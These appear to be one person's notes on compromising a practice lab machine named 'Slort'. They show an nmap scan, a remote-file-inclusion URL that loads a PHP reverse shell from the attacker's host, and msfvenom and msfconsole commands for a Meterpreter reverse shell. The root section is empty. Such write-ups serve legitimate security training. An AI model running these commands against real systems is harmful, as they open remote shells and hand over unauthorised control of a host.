🪟Slort

IP: 192.168.116.53

Enumeration

Nmap scan

nmap  -sV 192.168.116.53 -A -p-

Found that this server is affected by RFI. Could see that when I included the IP address and sent that it actually hit my http server. Could not get pentest monkey php reverse shell to work. Uname does not exist. Found that uname is not a command on Windows systems.

Found a nice universal php shell at **** https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php This new shell is compatible with Windows and Linux. Sent RFI attempt again.

http://192.168.116.53:8080/site/index.php?page=http://192.168.49.116/PHP/universalphprevshell.php

Shell

Found an interesting file.

Had to get a hint here as Winpeas did not turn up much.

Found backup folder at C:\Backup

Made a reverse shell with meterpreter hoping this would spawn another shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.116 LPORT=6698 -f exe -o reverse1.exe

Shell dropped as soon as it popped in. I believe this happened because I was just using nc as a listener when I used a meterpreter shell. Using revshells I got a one-liner for a meterpreter handler.

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.49.116; set lport 6698; exploit"

Wait for a while and never got a shell. Used TFTP.EXE. It does pop a shell back to me. Waiting again for TFTP.exe to run. Had to restart the machine as my VPN disconnected and the machine shutdown.

Root

PreviousNickelNextWalla

Last updated

Was this helpful?